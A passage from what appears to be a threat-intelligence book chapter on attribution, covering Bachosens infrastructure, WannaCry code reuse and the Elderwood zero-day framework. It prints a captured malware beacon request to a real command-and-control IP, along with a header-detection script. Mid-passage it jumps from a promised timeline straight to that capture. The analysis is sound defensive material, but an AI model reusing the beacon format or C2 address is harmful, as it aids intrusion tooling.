Symantec used domain registration and DNS records associated with the attacks to map out two years’ worth of infrastructure. Patterns in both the malware and the infrastructure matched the naming and DGA format seen in Bachosens, and each year’s operations relied on 13 domains. However, analysis of an older variant of the malware revealed a slight variation in tactics for creating those 13 domains: only 12 of them were created and dynamically registered via the DGA. The malware still used a total of 13 C&C servers, but the attacker created the remaining domain through traditional means, by purchasing and registering it through a registrar. The domain hadn’t seen use for some time, but oddly enough, the registrant didn’t attempt to mask their identity or even use a domain privacy protection service.
In addition to this registration tie that Symantec identified, a number of AAAA records associated with other IPv6 addresses appeared in older Bachosens malware samples that others had submitted to public malware repositories. Researching these public samples revealed several other historical domains hosted on infrastructure the attacker had previously used. As in Symantec’s report, the domains shared registration details that linked to the same individual previously attributed to the attacks. As mentioned earlier, passive DNS and domain registration records can often reveal patterns in an adversary’s infrastructure.
Solid analytical methods and tools allowed researchers to overcome both the DGA and the covert communication method the malware used, and to build out and associate a timeline of attacker infrastructure. Eventually, this led to the adversary’s OSINT missteps discussed earlier. More importantly, this example demonstrates how attackers create advanced malware that hides in plain sight by utilizing legitimate protocols, allowing them to pass through defenses without proper inspection, compromise an unknowing victim, and steal vital intellectual property. While the attribution details are outside the scope of this chapter, you can find further details about the Bachosens malware in the article “Operation Bachosens: A Detailed Look into a Long-Running Cyber Crime Campaign” on Medium.com.
One thing that malware, scripts, and software applications all have in common is that humans create them. And humans often reuse code; after all, it’s our nature to want to work smarter, not harder. If a developer already has a piece of code to provide a certain functionality, they’ll often simply reuse it rather than spend the time creating something new. Attackers don’t want to write new code from scratch just for the sake of having it be original. But this code reuse may have implications for attribution once the malware appears in real-world attacks. We’ve discussed how attackers may try to remain undetected by using open source software. Yet while open source code may be easy to use and makes attribution difficult, it doesn’t make for particularly advanced or sophisticated malware. Given its drawbacks, nation-states will often develop their own tools, which takes a lot of resources and funding.
The good news is that some of the most complex and large-scale attacks against formidable organizations are now public knowledge. Unfortunately, this doesn’t mean the attacks failed, nor does it mean that attackers have faced any repercussions. What it does mean is that future attacks may become easier to attribute, due to attackers’ tendencies to reuse code. Patterns in malware alone are generally not enough evidence for an attribution claim, which should come from multiple sources. However, there are exceptions: when you’re dealing with advanced but exceedingly rare or unknown malware, your confidence level can be higher. Given these risks, it may seem crazy for a high-stakes espionage operation to reuse code present in highly public attacks. Yet this scenario has occurred many times, including in 2017, in a global cyberattack. The following story is a great example of how and why attackers reuse code, as well as how defenders can use recycled code against the attacker for attribution purposes.
On Friday, May 12, 2017, reports of a massive ransomware outbreak rapidly surfaced. A new ransomware variant was infecting users quickly due to its design: the attackers had built a ransomware module into a self-propagating worm. The malware could not only infect victims but also spread from one to the next, crippling entire organizations. A ransomware attack on this scale had rarely, if ever, happened before. Within hours of the first signs of activity, media organizations began calling the malware WannaCry.
Mitigating the threat was the top priority for defenders and security vendors at the time. The second priority was identifying evidence to determine who was behind the attack. Thankfully, a major breach, disclosed only a month prior, provided clues. In April 2017, a hacker group calling itself the Shadow Brokers publicly released a trove of files, which they claimed to have stolen from the U.S. government. (To date, the truth of this claim remains nebulous.)
The dataset included malware that exploited a vulnerability in Microsoft’s Server Message Block (SMB) protocol, which is designed to provide shared access to files, printers, and other devices within Windows environments.17 This made for an effective mechanism for distributing malware, since the SMB protocol already communicated with many devices within networks. Moreover, use of the exploit would not help defenders attribute the attack, given that anyone could download and access the leaked malware. The protocol exploit proved the perfect vector for spreading the WannaCry malware.
Regardless of an outbreak’s size, one of the first things defenders and researchers always do is determine where and how the outbreak began. Finding the first known infected host, known as patient zero, can provide valuable information, such as how the infection started. Upon identifying the initial victim, you can then often find other tools or malware, which may provide additional clues about the attacker. In the case of WannaCry, defenders found evidence showing that the first infections began with a few computers three months prior, in February 2017. (Interestingly, the ransomware did not spread at a consistent rate: it spread much faster in May than in February. One theory is that the February instance was simply a test run. After all, it is best practice to test your tools before deploying them. It’s plausible that the attacker was trying to check if defenders would detect the attack.) From there, the attack proceeded to grow from just a few computers to a global ransomware epidemic.18
One of the first clues as to who was behind the WannaCry infections came from a now-public investigation claiming that the earliest infected systems also contained another malware variant, Backdoor.Destover. More importantly, this was the malware used in the 2014 attacks against Sony Pictures Entertainment, attributed to North Korea. It is highly improbable that both espionage-grade malware and unique ransomware would have coincidentally infected the same three computers in February 2017. Still, defenders needed more evidence to prove North Korea was behind the WannaCry attack.
The next clue came on Monday, May 15, by which point the WannaCry ransomware had made millions of infection attempts. Neel Mehta, a Google security researcher, tweeted about a very distinctive cipher associated with the WannaCry malware (Figure 6-4).
Figure 6-4: Tweet from Neel Mehta documenting his discovery of the cipher
Security vendors already researching the WannaCry malware began to look more closely at the cipher. They compared it with samples from their malware repositories, searching for previous instances where the cipher had appeared. This was how they discovered that WannaCry shared the cipher with malware known as Cruprox and Contopee, custom nation-state malware variants previously attributed to North Korea. This, along with the Destover malware found on the same victims as the February 2017 WannaCry infections, provided significant evidence.
WannaCry is a great example of adversaries reusing code across multiple malware families. Had the attacker created a new cipher for WannaCry rather than reusing an existing one, defenders wouldn’t have been able to provide evidence to support the attribution theory. Today, the North Korea attribution is widely accepted based on the cipher and other supporting evidence. Comparing shared code is a good exercise to conduct when you find new targeted malware but don’t know the attacker. You have to be cognizant of false flags and have multiple pieces of evidence to support attribution, but shared code between malware families is often a strong supporting factor.
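A toy version of the repository search that vendors performed might look like the following. The byte blobs here are hypothetical stand-ins for malware samples; real comparisons use disassembly, YARA rules, and fuzzy hashing rather than a naive substring scan.

```python
def shared_sequences(sample_a: bytes, sample_b: bytes, min_len: int = 8) -> set:
    """Collect byte chunks of length min_len from sample_a that also appear
    verbatim in sample_b -- a crude stand-in for the repository-wide
    similarity searches vendors ran after the shared cipher was spotted."""
    found = set()
    for i in range(len(sample_a) - min_len + 1):
        chunk = sample_a[i:i + min_len]
        if chunk in sample_b:
            found.add(chunk)
    return found

# Hypothetical blobs standing in for two unrelated-looking samples that
# happen to embed the same cipher routine.
cipher_stub = bytes(range(32))
wannacry_like = b"\x90" * 40 + cipher_stub + b"\xcc" * 40
contopee_like = b"\x41" * 25 + cipher_stub + b"\x42" * 10
matches = shared_sequences(wannacry_like, contopee_like, min_len=16)
print(len(matches) > 0)  # True
```

Even this crude approach shows the principle: a sufficiently long, distinctive byte sequence appearing in two otherwise different binaries is unlikely to be coincidence, which is why the shared cipher carried so much attributive weight.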
Similar to how code reuse can help with identifying malware developed by the same authors, the reuse of specific vulnerabilities can sometimes aid in attributing an attack. The malware itself needs a vulnerability to exploit in order to deliver its payload. Nation-state attackers often perform extensive reconnaissance, profiling the systems and applications their target uses to identify unpatched software that they can then compromise.
Software evolves until it reaches an end-of-life state. During a program’s lifecycle, vendors fix flaws by releasing patches alongside other updates. The most severe flaws are those that let an attacker bypass or gain access past a victim’s security controls; these are the flaws we refer to as security vulnerabilities. Because security vulnerabilities are far more urgent than routine software defects, patching them is a high priority for vendors. Thus, just like software, vulnerabilities have a lifespan, from the moment defenders discover them to the moment they’re patched and remediated. As we’ve discussed elsewhere in this book, the term zero-day exploit refers to an exploit for a security vulnerability that has no current patch or remedy. These are the worst kinds of vulnerabilities because, quite simply, there is no way to defend against them in the moment. Even worse is when attackers can exploit these unpatched vulnerabilities remotely; in those cases, all the attacker needs is an internet connection.
Due to their severity, zero-day exploits typically command a high price on the open market, for a few reasons. First, they are extremely difficult to find; identifying a viable zero-day exploit often requires a great deal of time and money. Second, these exploits are attractive not only to criminals but also to nation-state attackers. Historically, the most dangerous and effective zero-day exploits have appeared in government-grade espionage attacks. For example, a number of zero-day exploits allegedly allowed U.S. government hackers to infiltrate the SCADA systems and networks of Iran-based nuclear facilities in the mid-to-late 2000s. The breach made centrifuges spin much faster than normal, damaging the facility and slowing Iran’s nuclear development.19
One of the interesting things about zero-day exploits is how nation-states employ them in their operations. Nation-state attackers use zero-day exploits more than any other attacker. Since the value and effectiveness of a zero-day exploit significantly decrease once defenders have discovered it, some adversaries have maximized their usefulness by implementing systems to distribute them among various cyber units. Perhaps the best example of this phenomenon is the set of targeted attacks allegedly conducted by China between 2010 and 2014: China developed a framework to distribute exploits among its cyberwarfare elements, causing the same exploits to appear in a number of well-documented public attacks.20 This zero-day distribution model has been named the Elderwood framework. There is likely much more to it than we can derive from publicly available information. Nevertheless, the Elderwood framework shows that several China-based groups have abnormally high levels of access to zero days, supporting the theory that these groups are affiliated with one another, and providing further evidence for attribution claims that nation-states fund these attacks.
Table 6-1 lists the zero days distributed among China-based espionage groups between 2010 and 2014. Notice that the table’s left column lists an identifier for each vulnerability, called a CVE. Whenever defenders identify a vulnerability, they assign it a Common Vulnerabilities and Exposures (CVE) identifier that catalogs the vulnerability’s technical details, including how attackers can exploit it. The identifier helps defenders find information such as what the vulnerability is, when it was discovered, and when a patch, if available, was released to remediate it.
Table 6-1: Elderwood Exploit List
CVE vulnerability | Program exploited
2010-0249 | MS Internet Explorer
2011-0609 | Adobe Flash
2011-0611 | Adobe Flash
2011-2110 | Adobe Flash
2012-0779 | Adobe Flash
2012-1535 | Adobe Flash
2012-1875 | MS Internet Explorer
2012-4792 | MS Internet Explorer
2012-1889 | MS XML Core Services
2013-0640 | Adobe Flash
2013-3644 | Just Systems Ichitaro Word Processor
2013-3893 | MS Internet Explorer
2014-0322 | MS Internet Explorer
The following timeline details prominent examples of how the attackers used these exploits, which group specifically used them, and the industries that the zero days impacted.21
POST /info.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Agtid: [8 chars]08x
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: 180.150.228.102:443
Content-Length: 1045
Connection: Keep-Alive
Cache-Control: no-cache
This is the same adversary behind the Bit9 compromise of 2012 (reported in February 2013), an assessment likely based on the reuse of the same domain registration details in both this activity and the Bit9 compromise.
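As a small illustration of how a defender might triage traffic for this indicator, the following sketch scans raw HTTP headers for the nonstandard Agtid header shown in the capture above. The header name comes from the capture; the sample request and its values are hypothetical.

```python
def find_agtid(raw_request: str):
    """Return the value of the nonstandard Agtid header if present, else None.

    A triage sketch for proxy logs or packet captures: standard clients
    never send an Agtid header, so any hit is worth investigating.
    """
    for line in raw_request.splitlines():
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "agtid":
            return value.strip()
    return None

# Hypothetical request mimicking the capture's [8 chars]08x pattern.
request = (
    "POST /info.asp HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Agtid: 1a2b3c4d08x\r\n"
    "Host: 180.150.228.102:443\r\n"
)
print(find_agtid(request))  # 1a2b3c4d08x
```

In practice, a check like this would run inside an IDS rule or a log-processing pipeline rather than standalone Python, but the principle is the same: rare, malware-specific header names make excellent network indicators.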
This list of zero days and the attackers behind them may seem repetitive—and it is. You might have noticed that, in some cases, the same zero-day exploits appeared among multiple groups within days or weeks of one another, all before a patch could protect victims. The probability that multiple attackers, originating from the same geographical location and engaging in espionage campaigns against similar industries, would all have access to the same zero-day exploit is slim.
As you’ve seen in this chapter, resourceful attackers constantly come up with new ways to exploit technologies and breach environments. Defenders need to understand how to investigate these types of attacks to protect against them successfully. Spear-phishing emails are the most common tactic used to gain the initial access into targeted environments, yet many defenders don’t understand how to analyze them and extract meaningful information. Now that you know the significant fields within the SMTP header, you can identify fraudulent emails.
Unfortunately, from time to time, attackers do breach the environments we are responsible for protecting. Covert communications are difficult to identify and often go undetected by automated defenses, making nation-state attackers who use these covert methods to deliver zero-day exploits a challenge for defenders. However, knowing how your adversary achieved these breaches in the past can help you conduct more effective threat hunting operations and better protect against them in the future.